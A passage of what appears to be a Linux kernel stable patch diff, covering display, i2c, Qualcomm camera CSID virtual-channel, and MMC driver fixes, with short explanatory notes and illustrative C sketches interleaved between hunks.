++			.dispclk_mhz = 734.0,
++			.dppclk_mhz = 734.0,
++			.phyclk_mhz = 810.0,
++			.socclk_mhz = 875.0,
++			.dscclk_mhz = 245.0,
++			.dram_speed_mts = 1670.0,
++		},
++		{
++			.state = 3,
++			.dcfclk_mhz = 1000.0,
++			.fabricclk_mhz = 1000.0,
++			.dispclk_mhz = 1100.0,
++			.dppclk_mhz = 1100.0,
++			.phyclk_mhz = 810.0,
++			.socclk_mhz = 1000.0,
++			.dscclk_mhz = 367.0,
++			.dram_speed_mts = 2000.0,
++		},
++		{
++			.state = 4,
++			.dcfclk_mhz = 1200.0,
++			.fabricclk_mhz = 1200.0,
++			.dispclk_mhz = 1284.0,
++			.dppclk_mhz = 1284.0,
++			.phyclk_mhz = 810.0,
++			.socclk_mhz = 1200.0,
++			.dscclk_mhz = 428.0,
++			.dram_speed_mts = 2000.0,
++		},
++		{
++			.state = 5,
++			.dcfclk_mhz = 1200.0,
++			.fabricclk_mhz = 1200.0,
++			.dispclk_mhz = 1284.0,
++			.dppclk_mhz = 1284.0,
++			.phyclk_mhz = 810.0,
++			.socclk_mhz = 1200.0,
++			.dscclk_mhz = 428.0,
++			.dram_speed_mts = 2000.0,
++		},
++	},
++
++	.num_states = 5,
++	.sr_exit_time_us = 1.9,
++	.sr_enter_plus_exit_time_us = 4.4,
++	.urgent_latency_us = 3.0,
++	.urgent_latency_pixel_data_only_us = 4.0,
++	.urgent_latency_pixel_mixed_with_vm_data_us = 4.0,
++	.urgent_latency_vm_data_only_us = 4.0,
++	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
++	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
++	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
++	.pct_ideal_dram_sdp_bw_after_urgent_pixel_only = 40.0,
++	.pct_ideal_dram_sdp_bw_after_urgent_pixel_and_vm = 40.0,
++	.pct_ideal_dram_sdp_bw_after_urgent_vm_only = 40.0,
++	.max_avg_sdp_bw_use_normal_percent = 40.0,
++	.max_avg_dram_bw_use_normal_percent = 40.0,
++	.writeback_latency_us = 12.0,
++	.ideal_dram_bw_after_urgent_percent = 40.0,
++	.max_request_size_bytes = 256,
++	.dram_channel_width_bytes = 16,
++	.fabric_datapath_to_dcn_data_return_bytes = 64,
++	.dcn_downspread_percent = 0.5,
++	.downspread_percent = 0.5,
++	.dram_page_open_time_ns = 50.0,
++	.dram_rw_turnaround_time_ns = 17.5,
++	.dram_return_buffer_per_channel_bytes = 8192,
++	.round_trip_ping_latency_dcfclk_cycles = 131,
++	.urgent_out_of_order_return_per_channel_bytes = 4096,
++	.channel_interleave_bytes = 256,
++	.num_banks = 8,
++	.num_chans = 16,
++	.vmm_page_size_bytes = 4096,
++	.dram_clock_change_latency_us = 45.0,
++	.writeback_dram_clock_change_latency_us = 23.0,
++	.return_bus_width_bytes = 64,
++	.dispclk_dppclk_vco_speed_mhz = 3850,
++	.xfc_bus_transport_time_us = 20,
++	.xfc_xbuf_latency_tolerance_us = 50,
++	.use_urgent_burst_bw = 0,
++};
+ 
+ struct _vcs_dpi_ip_params_st dcn2_1_ip = {
+ 	.odm_capable = 1,
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index 1b5c27ed27370..ff4d0564122a3 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -527,6 +527,7 @@ static ssize_t ti_sn_aux_transfer(struct drm_dp_aux *aux,
+ 	u32 request_val = AUX_CMD_REQ(msg->request);
+ 	u8 *buf = msg->buffer;
+ 	unsigned int len = msg->size;
++	unsigned int short_len;
+ 	unsigned int val;
+ 	int ret;
+ 	u8 addr_len[SN_AUX_LENGTH_REG + 1 - SN_AUX_ADDR_19_16_REG];
+@@ -600,7 +601,8 @@ static ssize_t ti_sn_aux_transfer(struct drm_dp_aux *aux,
+ 	}
+ 
+ 	if (val & AUX_IRQ_STATUS_AUX_SHORT) {
+-		ret = regmap_read(pdata->regmap, SN_AUX_LENGTH_REG, &len);
++		ret = regmap_read(pdata->regmap, SN_AUX_LENGTH_REG, &short_len);
++		len = min(len, short_len);
+ 		if (ret)
+ 			goto exit;
+ 	} else if (val & AUX_IRQ_STATUS_NAT_I2C_FAIL) {
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 5970f4149090f..4699c21102261 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -3707,7 +3707,7 @@ static void intel_dp_process_phy_request(struct intel_dp *intel_dp,
+ 			  intel_dp->train_set, crtc_state->lane_count);
+ 
+ 	drm_dp_set_phy_test_pattern(&intel_dp->aux, data,
+-				    link_status[DP_DPCD_REV]);
++				    intel_dp->dpcd[DP_DPCD_REV]);
+ }
+ 
+ static u8 intel_dp_autotest_phy_pattern(struct intel_dp *intel_dp)
+diff --git a/drivers/gpu/drm/mgag200/mgag200_drv.h b/drivers/gpu/drm/mgag200/mgag200_drv.h
+index f0c2349404b46..aebd09e2d4087 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_drv.h
++++ b/drivers/gpu/drm/mgag200/mgag200_drv.h
+@@ -390,6 +390,11 @@ void mgag200_primary_plane_helper_atomic_disable(struct drm_plane *plane,
+ 	.destroy = drm_plane_cleanup, \
+ 	DRM_GEM_SHADOW_PLANE_FUNCS
+ 
++void mgag200_crtc_set_gamma_linear(struct mga_device *mdev, const struct drm_format_info *format);
++void mgag200_crtc_set_gamma(struct mga_device *mdev,
++			    const struct drm_format_info *format,
++			    struct drm_color_lut *lut);
++
+ enum drm_mode_status mgag200_crtc_helper_mode_valid(struct drm_crtc *crtc,
+ 						    const struct drm_display_mode *mode);
+ int mgag200_crtc_helper_atomic_check(struct drm_crtc *crtc, struct drm_atomic_state *new_state);
+diff --git a/drivers/gpu/drm/mgag200/mgag200_g200er.c b/drivers/gpu/drm/mgag200/mgag200_g200er.c
+index bce267e0f7de3..8d4538b710477 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_g200er.c
++++ b/drivers/gpu/drm/mgag200/mgag200_g200er.c
+@@ -202,6 +202,11 @@ static void mgag200_g200er_crtc_helper_atomic_enable(struct drm_crtc *crtc,
+ 
+ 	mgag200_g200er_reset_tagfifo(mdev);
+ 
++	if (crtc_state->gamma_lut)
++		mgag200_crtc_set_gamma(mdev, format, crtc_state->gamma_lut->data);
++	else
++		mgag200_crtc_set_gamma_linear(mdev, format);
++
+ 	mgag200_enable_display(mdev);
+ 
+ 	if (funcs->enable_vidrst)
+diff --git a/drivers/gpu/drm/mgag200/mgag200_g200ev.c b/drivers/gpu/drm/mgag200/mgag200_g200ev.c
+index ac957f42abe18..56e6f986bff31 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_g200ev.c
++++ b/drivers/gpu/drm/mgag200/mgag200_g200ev.c
+@@ -203,6 +203,11 @@ static void mgag200_g200ev_crtc_helper_atomic_enable(struct drm_crtc *crtc,
+ 
+ 	mgag200_g200ev_set_hiprilvl(mdev);
+ 
++	if (crtc_state->gamma_lut)
++		mgag200_crtc_set_gamma(mdev, format, crtc_state->gamma_lut->data);
++	else
++		mgag200_crtc_set_gamma_linear(mdev, format);
++
+ 	mgag200_enable_display(mdev);
+ 
+ 	if (funcs->enable_vidrst)
+diff --git a/drivers/gpu/drm/mgag200/mgag200_g200se.c b/drivers/gpu/drm/mgag200/mgag200_g200se.c
+index bd6e573c9a1a3..ff2b3c6622e7a 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_g200se.c
++++ b/drivers/gpu/drm/mgag200/mgag200_g200se.c
+@@ -334,6 +334,11 @@ static void mgag200_g200se_crtc_helper_atomic_enable(struct drm_crtc *crtc,
+ 
+ 	mgag200_g200se_set_hiprilvl(mdev, adjusted_mode, format);
+ 
++	if (crtc_state->gamma_lut)
++		mgag200_crtc_set_gamma(mdev, format, crtc_state->gamma_lut->data);
++	else
++		mgag200_crtc_set_gamma_linear(mdev, format);
++
+ 	mgag200_enable_display(mdev);
+ 
+ 	if (funcs->enable_vidrst)
+diff --git a/drivers/gpu/drm/mgag200/mgag200_mode.c b/drivers/gpu/drm/mgag200/mgag200_mode.c
+index ae90b260312a5..554adf05e0734 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_mode.c
++++ b/drivers/gpu/drm/mgag200/mgag200_mode.c
+@@ -28,8 +28,8 @@
+  * This file contains setup code for the CRTC.
+  */
+ 
+-static void mgag200_crtc_set_gamma_linear(struct mga_device *mdev,
+-					  const struct drm_format_info *format)
++void mgag200_crtc_set_gamma_linear(struct mga_device *mdev,
++				   const struct drm_format_info *format)
+ {
+ 	int i;
+ 
+@@ -65,9 +65,9 @@ static void mgag200_crtc_set_gamma_linear(struct mga_device *mdev,
+ 	}
+ }
+ 
+-static void mgag200_crtc_set_gamma(struct mga_device *mdev,
+-				   const struct drm_format_info *format,
+-				   struct drm_color_lut *lut)
++void mgag200_crtc_set_gamma(struct mga_device *mdev,
++			    const struct drm_format_info *format,
++			    struct drm_color_lut *lut)
+ {
+ 	int i;
+ 
+diff --git a/drivers/i2c/i2c-core.h b/drivers/i2c/i2c-core.h
+index 05b8b8dfa9bdd..36587f38dff3d 100644
+--- a/drivers/i2c/i2c-core.h
++++ b/drivers/i2c/i2c-core.h
+@@ -3,6 +3,7 @@
+  * i2c-core.h - interfaces internal to the I2C framework
+  */
+ 
++#include <linux/kconfig.h>
+ #include <linux/rwsem.h>
+ 
+ struct i2c_devinfo {
+@@ -29,7 +30,8 @@ int i2c_dev_irq_from_resources(const struct resource *resources,
+  */
+ static inline bool i2c_in_atomic_xfer_mode(void)
+ {
+-	return system_state > SYSTEM_RUNNING && !preemptible();
++	return system_state > SYSTEM_RUNNING &&
++	       (IS_ENABLED(CONFIG_PREEMPT_COUNT) ? !preemptible() : irqs_disabled());
+ }
+ 
+ static inline int __i2c_lock_bus_helper(struct i2c_adapter *adap)
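(The IS_ENABLED() split matters because preemptible() degenerates on kernels built
without preempt counting. Simplified from include/linux/preempt.h:

#ifdef CONFIG_PREEMPT_COUNT
#define preemptible()	(preempt_count() == 0 && !irqs_disabled())
#else
#define preemptible()	0	/* no tracking: cannot tell */
#endif

With CONFIG_PREEMPT_COUNT=n, !preemptible() is always true, so every transfer after
SYSTEM_RUNNING would be forced down the atomic path; irqs_disabled() remains a
meaningful, if weaker, test on such kernels.)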
+diff --git a/drivers/interconnect/qcom/sm8250.c b/drivers/interconnect/qcom/sm8250.c
+index 9c2dd40d9a559..5cdb058fa0959 100644
+--- a/drivers/interconnect/qcom/sm8250.c
++++ b/drivers/interconnect/qcom/sm8250.c
+@@ -551,7 +551,6 @@ static struct platform_driver qnoc_driver = {
+ 	.driver = {
+ 		.name = "qnoc-sm8250",
+ 		.of_match_table = qnoc_of_match,
+-		.sync_state = icc_sync_state,
+ 	},
+ };
+ module_platform_driver(qnoc_driver);
+diff --git a/drivers/media/platform/qcom/camss/camss-csid-gen2.c b/drivers/media/platform/qcom/camss/camss-csid-gen2.c
+index 904208f6f9546..0147cc062e1ae 100644
+--- a/drivers/media/platform/qcom/camss/camss-csid-gen2.c
++++ b/drivers/media/platform/qcom/camss/camss-csid-gen2.c
+@@ -334,13 +334,14 @@ static const struct csid_format csid_formats[] = {
+ 	},
+ };
+ 
+-static void csid_configure_stream(struct csid_device *csid, u8 enable)
++static void __csid_configure_stream(struct csid_device *csid, u8 enable, u8 vc)
+ {
+ 	struct csid_testgen_config *tg = &csid->testgen;
+ 	u32 val;
+ 	u32 phy_sel = 0;
+ 	u8 lane_cnt = csid->phy.lane_cnt;
+-	struct v4l2_mbus_framefmt *input_format = &csid->fmt[MSM_CSID_PAD_SRC];
++	/* Source pads matching RDI channels on hardware. Pad 1 -> RDI0, Pad 2 -> RDI1, etc. */
++	struct v4l2_mbus_framefmt *input_format = &csid->fmt[MSM_CSID_PAD_FIRST_SRC + vc];
+ 	const struct csid_format *format = csid_get_fmt_entry(csid->formats, csid->nformats,
+ 							      input_format->code);
+ 
+@@ -351,8 +352,19 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 		phy_sel = csid->phy.csiphy_id;
+ 
+ 	if (enable) {
+-		u8 vc = 0; /* Virtual Channel 0 */
+-		u8 dt_id = vc * 4;
++		/*
++		 * DT_ID is a two-bit bitfield that is concatenated with
++		 * the four least significant bits of the five-bit VC
++		 * bitfield to generate an internal CID value.
++		 *
++		 * CSID_RDI_CFG0(vc)
++		 * DT_ID : 28:27
++		 * VC    : 26:22
++		 * DT    : 21:16
++		 *
++		 * CID   : VC 3:0 << 2 | DT_ID 1:0
++		 */
++		u8 dt_id = vc & 0x03;
+ 
+ 		if (tg->enabled) {
+ 			/* configure one DT, infinite frames */
+@@ -392,42 +404,42 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 		val |= format->data_type << RDI_CFG0_DATA_TYPE;
+ 		val |= vc << RDI_CFG0_VIRTUAL_CHANNEL;
+ 		val |= dt_id << RDI_CFG0_DT_ID;
+-		writel_relaxed(val, csid->base + CSID_RDI_CFG0(0));
++		writel_relaxed(val, csid->base + CSID_RDI_CFG0(vc));
+ 
+ 		/* CSID_TIMESTAMP_STB_POST_IRQ */
+ 		val = 2 << RDI_CFG1_TIMESTAMP_STB_SEL;
+-		writel_relaxed(val, csid->base + CSID_RDI_CFG1(0));
++		writel_relaxed(val, csid->base + CSID_RDI_CFG1(vc));
+ 
+ 		val = 1;
+-		writel_relaxed(val, csid->base + CSID_RDI_FRM_DROP_PERIOD(0));
++		writel_relaxed(val, csid->base + CSID_RDI_FRM_DROP_PERIOD(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_FRM_DROP_PATTERN(0));
++		writel_relaxed(val, csid->base + CSID_RDI_FRM_DROP_PATTERN(vc));
+ 
+ 		val = 1;
+-		writel_relaxed(val, csid->base + CSID_RDI_IRQ_SUBSAMPLE_PERIOD(0));
++		writel_relaxed(val, csid->base + CSID_RDI_IRQ_SUBSAMPLE_PERIOD(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_IRQ_SUBSAMPLE_PATTERN(0));
++		writel_relaxed(val, csid->base + CSID_RDI_IRQ_SUBSAMPLE_PATTERN(vc));
+ 
+ 		val = 1;
+-		writel_relaxed(val, csid->base + CSID_RDI_RPP_PIX_DROP_PERIOD(0));
++		writel_relaxed(val, csid->base + CSID_RDI_RPP_PIX_DROP_PERIOD(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_RPP_PIX_DROP_PATTERN(0));
++		writel_relaxed(val, csid->base + CSID_RDI_RPP_PIX_DROP_PATTERN(vc));
+ 
+ 		val = 1;
+-		writel_relaxed(val, csid->base + CSID_RDI_RPP_LINE_DROP_PERIOD(0));
++		writel_relaxed(val, csid->base + CSID_RDI_RPP_LINE_DROP_PERIOD(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_RPP_LINE_DROP_PATTERN(0));
++		writel_relaxed(val, csid->base + CSID_RDI_RPP_LINE_DROP_PATTERN(vc));
+ 
+ 		val = 0;
+-		writel_relaxed(val, csid->base + CSID_RDI_CTRL(0));
++		writel_relaxed(val, csid->base + CSID_RDI_CTRL(vc));
+ 
+-		val = readl_relaxed(csid->base + CSID_RDI_CFG0(0));
++		val = readl_relaxed(csid->base + CSID_RDI_CFG0(vc));
+ 		val |=  1 << RDI_CFG0_ENABLE;
+-		writel_relaxed(val, csid->base + CSID_RDI_CFG0(0));
++		writel_relaxed(val, csid->base + CSID_RDI_CFG0(vc));
+ 	}
+ 
+ 	if (tg->enabled) {
+@@ -446,6 +458,8 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 	writel_relaxed(val, csid->base + CSID_CSI2_RX_CFG0);
+ 
+ 	val = 1 << CSI2_RX_CFG1_PACKET_ECC_CORRECTION_EN;
++	if (vc > 3)
++		val |= 1 << CSI2_RX_CFG1_VC_MODE;
+ 	val |= 1 << CSI2_RX_CFG1_MISR_EN;
+ 	writel_relaxed(val, csid->base + CSID_CSI2_RX_CFG1);
+ 
+@@ -453,7 +467,16 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 		val = HALT_CMD_RESUME_AT_FRAME_BOUNDARY << RDI_CTRL_HALT_CMD;
+ 	else
+ 		val = HALT_CMD_HALT_AT_FRAME_BOUNDARY << RDI_CTRL_HALT_CMD;
+-	writel_relaxed(val, csid->base + CSID_RDI_CTRL(0));
++	writel_relaxed(val, csid->base + CSID_RDI_CTRL(vc));
++}
++
++static void csid_configure_stream(struct csid_device *csid, u8 enable)
++{
++	u8 i;
++	/* Loop through all enabled VCs and configure stream for each */
++	for (i = 0; i < MSM_CSID_MAX_SRC_STREAMS; i++)
++		if (csid->phy.en_vc & BIT(i))
++			__csid_configure_stream(csid, enable, i);
+ }
+ 
+ static int csid_configure_testgen_pattern(struct csid_device *csid, s32 val)
+@@ -499,6 +522,7 @@ static irqreturn_t csid_isr(int irq, void *dev)
+ 	struct csid_device *csid = dev;
+ 	u32 val;
+ 	u8 reset_done;
++	int i;
+ 
+ 	val = readl_relaxed(csid->base + CSID_TOP_IRQ_STATUS);
+ 	writel_relaxed(val, csid->base + CSID_TOP_IRQ_CLEAR);
+@@ -507,8 +531,12 @@ static irqreturn_t csid_isr(int irq, void *dev)
+ 	val = readl_relaxed(csid->base + CSID_CSI2_RX_IRQ_STATUS);
+ 	writel_relaxed(val, csid->base + CSID_CSI2_RX_IRQ_CLEAR);
+ 
+-	val = readl_relaxed(csid->base + CSID_CSI2_RDIN_IRQ_STATUS(0));
+-	writel_relaxed(val, csid->base + CSID_CSI2_RDIN_IRQ_CLEAR(0));
++	/* Read and clear IRQ status for each enabled RDI channel */
++	for (i = 0; i < MSM_CSID_MAX_SRC_STREAMS; i++)
++		if (csid->phy.en_vc & BIT(i)) {
++			val = readl_relaxed(csid->base + CSID_CSI2_RDIN_IRQ_STATUS(i));
++			writel_relaxed(val, csid->base + CSID_CSI2_RDIN_IRQ_CLEAR(i));
++		}
+ 
+ 	val = 1 << IRQ_CMD_CLEAR;
+ 	writel_relaxed(val, csid->base + CSID_IRQ_CMD);
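(The DT_ID/VC/CID layout described in the comment added above can be made concrete
with a short sketch, not driver code:

/* CID = VC[3:0] << 2 | DT_ID[1:0]; the patch picks dt_id = vc & 0x03. */
static inline u8 csid_cid(u8 vc)
{
	u8 dt_id = vc & 0x03;

	return ((vc & 0x0f) << 2) | dt_id;	/* vc = 5 -> dt_id 1, CID 0x15 */
}
)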
+diff --git a/drivers/media/platform/qcom/camss/camss-csid.c b/drivers/media/platform/qcom/camss/camss-csid.c
+index 88f188e0f7501..6360314f04a63 100644
+--- a/drivers/media/platform/qcom/camss/camss-csid.c
++++ b/drivers/media/platform/qcom/camss/camss-csid.c
+@@ -196,6 +196,8 @@ static int csid_set_power(struct v4l2_subdev *sd, int on)
+ 			return ret;
+ 		}
+ 
++		csid->phy.need_vc_update = true;
++
+ 		enable_irq(csid->irq);
+ 
+ 		ret = csid->ops->reset(csid);
+@@ -249,7 +251,10 @@ static int csid_set_stream(struct v4l2_subdev *sd, int enable)
+ 			return -ENOLINK;
+ 	}
+ 
+-	csid->ops->configure_stream(csid, enable);
++	if (csid->phy.need_vc_update) {
++		csid->ops->configure_stream(csid, enable);
++		csid->phy.need_vc_update = false;
++	}
+ 
+ 	return 0;
+ }
+@@ -460,6 +465,7 @@ static int csid_set_format(struct v4l2_subdev *sd,
+ {
+ 	struct csid_device *csid = v4l2_get_subdevdata(sd);
+ 	struct v4l2_mbus_framefmt *format;
++	int i;
+ 
+ 	format = __csid_get_format(csid, sd_state, fmt->pad, fmt->which);
+ 	if (format == NULL)
+@@ -468,14 +474,14 @@ static int csid_set_format(struct v4l2_subdev *sd,
+ 	csid_try_format(csid, sd_state, fmt->pad, &fmt->format, fmt->which);
+ 	*format = fmt->format;
+ 
+-	/* Propagate the format from sink to source */
++	/* Propagate the format from sink to source pads */
+ 	if (fmt->pad == MSM_CSID_PAD_SINK) {
+-		format = __csid_get_format(csid, sd_state, MSM_CSID_PAD_SRC,
+-					   fmt->which);
++		for (i = MSM_CSID_PAD_FIRST_SRC; i < MSM_CSID_PADS_NUM; ++i) {
++			format = __csid_get_format(csid, sd_state, i, fmt->which);
+ 
+-		*format = fmt->format;
+-		csid_try_format(csid, sd_state, MSM_CSID_PAD_SRC, format,
+-				fmt->which);
++			*format = fmt->format;
++			csid_try_format(csid, sd_state, i, format, fmt->which);
++		}
+ 	}
+ 
+ 	return 0;
+@@ -738,7 +744,6 @@ static int csid_link_setup(struct media_entity *entity,
+ 		struct csid_device *csid;
+ 		struct csiphy_device *csiphy;
+ 		struct csiphy_lanes_cfg *lane_cfg;
+-		struct v4l2_subdev_format format = { 0 };
+ 
+ 		sd = media_entity_to_v4l2_subdev(entity);
+ 		csid = v4l2_get_subdevdata(sd);
+@@ -761,11 +766,22 @@ static int csid_link_setup(struct media_entity *entity,
+ 		lane_cfg = &csiphy->cfg.csi2->lane_cfg;
+ 		csid->phy.lane_cnt = lane_cfg->num_data;
+ 		csid->phy.lane_assign = csid_get_lane_assign(lane_cfg);
++	}
++	/* Decide which virtual channels to enable based on which source pads are enabled */
++	if (local->flags & MEDIA_PAD_FL_SOURCE) {
++		struct v4l2_subdev *sd = media_entity_to_v4l2_subdev(entity);
++		struct csid_device *csid = v4l2_get_subdevdata(sd);
++		struct device *dev = csid->camss->dev;
++
++		if (flags & MEDIA_LNK_FL_ENABLED)
++			csid->phy.en_vc |= BIT(local->index - 1);
++		else
++			csid->phy.en_vc &= ~BIT(local->index - 1);
+ 
+-		/* Reset format on source pad to sink pad format */
+-		format.pad = MSM_CSID_PAD_SRC;
+-		format.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+-		csid_set_format(&csid->subdev, NULL, &format);
++		csid->phy.need_vc_update = true;
++
++		dev_dbg(dev, "%s: Enabled CSID virtual channels mask 0x%x\n",
++			__func__, csid->phy.en_vc);
+ 	}
+ 
+ 	return 0;
+@@ -816,6 +832,7 @@ int msm_csid_register_entity(struct csid_device *csid,
+ 	struct v4l2_subdev *sd = &csid->subdev;
+ 	struct media_pad *pads = csid->pads;
+ 	struct device *dev = csid->camss->dev;
++	int i;
+ 	int ret;
+ 
+ 	v4l2_subdev_init(sd, &csid_v4l2_ops);
+@@ -852,7 +869,8 @@ int msm_csid_register_entity(struct csid_device *csid,
+ 	}
+ 
+ 	pads[MSM_CSID_PAD_SINK].flags = MEDIA_PAD_FL_SINK;
+-	pads[MSM_CSID_PAD_SRC].flags = MEDIA_PAD_FL_SOURCE;
++	for (i = MSM_CSID_PAD_FIRST_SRC; i < MSM_CSID_PADS_NUM; ++i)
++		pads[i].flags = MEDIA_PAD_FL_SOURCE;
+ 
+ 	sd->entity.function = MEDIA_ENT_F_PROC_VIDEO_PIXEL_FORMATTER;
+ 	sd->entity.ops = &csid_media_ops;
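(In the link-setup hunk above, source pad N maps to virtual channel N - 1, and
en_vc accumulates one bit per enabled pad. Illustration only:

u32 en_vc = 0;

en_vc |= BIT(1 - 1);	/* source pad 1 enabled -> VC0 */
en_vc |= BIT(3 - 1);	/* source pad 3 enabled -> VC2 */
/* en_vc == 0x5: csid_configure_stream() then programs RDI0 and RDI2 */
)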
+diff --git a/drivers/media/platform/qcom/camss/camss-csid.h b/drivers/media/platform/qcom/camss/camss-csid.h
+index f06040e44c515..d4b48432a0973 100644
+--- a/drivers/media/platform/qcom/camss/camss-csid.h
++++ b/drivers/media/platform/qcom/camss/camss-csid.h
+@@ -19,8 +19,13 @@
+ #include <media/v4l2-subdev.h>
+ 
+ #define MSM_CSID_PAD_SINK 0
+-#define MSM_CSID_PAD_SRC 1
+-#define MSM_CSID_PADS_NUM 2
++#define MSM_CSID_PAD_FIRST_SRC 1
++#define MSM_CSID_PADS_NUM 5
++
++#define MSM_CSID_PAD_SRC (MSM_CSID_PAD_FIRST_SRC)
++
++/* CSID hardware can demultiplex up to 4 outputs */
++#define MSM_CSID_MAX_SRC_STREAMS	4
+ 
+ #define DATA_TYPE_EMBEDDED_DATA_8BIT	0x12
+ #define DATA_TYPE_YUV420_8BIT		0x18
+@@ -81,6 +86,8 @@ struct csid_phy_config {
+ 	u8 csiphy_id;
+ 	u8 lane_cnt;
+ 	u32 lane_assign;
++	u32 en_vc;
++	u8 need_vc_update;
+ };
+ 
+ struct csid_device;
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index 770490234c872..e9ce53d200bc1 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -866,9 +866,10 @@ static const struct block_device_operations mmc_bdops = {
+ static int mmc_blk_part_switch_pre(struct mmc_card *card,
+ 				   unsigned int part_type)
+ {
++	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_RPMB;
+ 	int ret = 0;
+ 
+-	if (part_type == EXT_CSD_PART_CONFIG_ACC_RPMB) {
++	if ((part_type & mask) == mask) {
+ 		if (card->ext_csd.cmdq_en) {
+ 			ret = mmc_cmdq_disable(card);
+ 			if (ret)
+@@ -883,9 +884,10 @@ static int mmc_blk_part_switch_pre(struct mmc_card *card,
+ static int mmc_blk_part_switch_post(struct mmc_card *card,
+ 				    unsigned int part_type)
+ {
++	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_RPMB;
+ 	int ret = 0;
+ 
+-	if (part_type == EXT_CSD_PART_CONFIG_ACC_RPMB) {
++	if ((part_type & mask) == mask) {
+ 		mmc_retune_unpause(card->host);
+ 		if (card->reenable_cmdq && !card->ext_csd.cmdq_en)
+ 			ret = mmc_cmdq_enable(card);
+@@ -3180,4 +3182,3 @@ module_exit(mmc_blk_exit);
+ 
+ MODULE_LICENSE("GPL");
+ MODULE_DESCRIPTION("Multimedia Card (MMC) block device driver");
+-
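(EXT_CSD_PART_CONFIG_ACC_RPMB is 0x3 per the eMMC spec, and the part_type passed
here may carry further EXT_CSD_PART_CONFIG bits, so the old equality test could
miss an RPMB access. The mask test in isolation, as a sketch:

static bool accesses_rpmb(unsigned int part_type)
{
	const unsigned int mask = 0x3;	/* EXT_CSD_PART_CONFIG_ACC_RPMB */

	return (part_type & mask) == mask;
}
)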
+diff --git a/drivers/mmc/core/host.c b/drivers/mmc/core/host.c
+index b89dca1f15e9c..25c152ef5d60e 100644
+--- a/drivers/mmc/core/host.c
++++ b/drivers/mmc/core/host.c
+@@ -670,6 +670,7 @@ EXPORT_SYMBOL(mmc_remove_host);
+  */
+ void mmc_free_host(struct mmc_host *host)
+ {
++	cancel_delayed_work_sync(&host->detect);
+ 	mmc_pwrseq_free(host);
+ 	put_device(&host->class_dev);
+ }
+diff --git a/drivers/mmc/host/meson-mx-sdhc-mmc.c b/drivers/mmc/host/meson-mx-sdhc-mmc.c
+index da85c2f2acb83..c0e3b1634a88a 100644
+--- a/drivers/mmc/host/meson-mx-sdhc-mmc.c
++++ b/drivers/mmc/host/meson-mx-sdhc-mmc.c
+@@ -269,7 +269,7 @@ static int meson_mx_sdhc_enable_clks(struct mmc_host *mmc)
+ static int meson_mx_sdhc_set_clk(struct mmc_host *mmc, struct mmc_ios *ios)
+ {
+ 	struct meson_mx_sdhc_host *host = mmc_priv(mmc);
+-	u32 rx_clk_phase;
++	u32 val, rx_clk_phase;
+ 	int ret;
+ 
+ 	meson_mx_sdhc_disable_clks(mmc);
+@@ -290,27 +290,11 @@ static int meson_mx_sdhc_set_clk(struct mmc_host *mmc, struct mmc_ios *ios)
+ 		mmc->actual_clock = clk_get_rate(host->sd_clk);
+ 
+ 		/*
+-		 * according to Amlogic the following latching points are
+-		 * selected with empirical values, there is no (known) formula
+-		 * to calculate these.
++		 * Phase 90 should work in most cases. For data transmission,
++		 * meson_mx_sdhc_execute_tuning() will find an accurate value.
+ 		 */
+-		if (mmc->actual_clock > 100000000) {
+-			rx_clk_phase = 1;
+-		} else if (mmc->actual_clock > 45000000) {
+-			if (ios->signal_voltage == MMC_SIGNAL_VOLTAGE_330)
+-				rx_clk_phase = 15;
+-			else
+-				rx_clk_phase = 11;
+-		} else if (mmc->actual_clock >= 25000000) {
+-			rx_clk_phase = 15;
+-		} else if (mmc->actual_clock > 5000000) {
+-			rx_clk_phase = 23;
+-		} else if (mmc->actual_clock > 1000000) {
+-			rx_clk_phase = 55;
+-		} else {
+-			rx_clk_phase = 1061;
+-		}
+-
++		regmap_read(host->regmap, MESON_SDHC_CLKC, &val);
++		rx_clk_phase = FIELD_GET(MESON_SDHC_CLKC_CLK_DIV, val) / 4;
+ 		regmap_update_bits(host->regmap, MESON_SDHC_CLK2,
+ 				   MESON_SDHC_CLK2_RX_CLK_PHASE,
+ 				   FIELD_PREP(MESON_SDHC_CLK2_RX_CLK_PHASE,
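(One SD clock period spans CLK_DIV input-clock cycles, so a quarter of the divider
value latches RX data 90 degrees after the clock edge. The arithmetic in isolation,
as a sketch:

static u32 rx_phase_90(u32 clk_div)
{
	return clk_div / 4;	/* 360 degrees == clk_div input cycles */
}
)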
+diff --git a/drivers/mmc/host/sdhci-sprd.c b/drivers/mmc/host/sdhci-sprd.c
+index 2101b6e794c0e..66c1782823d89 100644
+--- a/drivers/mmc/host/sdhci-sprd.c
++++ b/drivers/mmc/host/sdhci-sprd.c
+@@ -228,15 +228,19 @@ static inline void _sdhci_sprd_set_clock(struct sdhci_host *host,
+ 	div = ((div & 0x300) >> 2) | ((div & 0xFF) << 8);
+ 	sdhci_enable_clk(host, div);
+ 
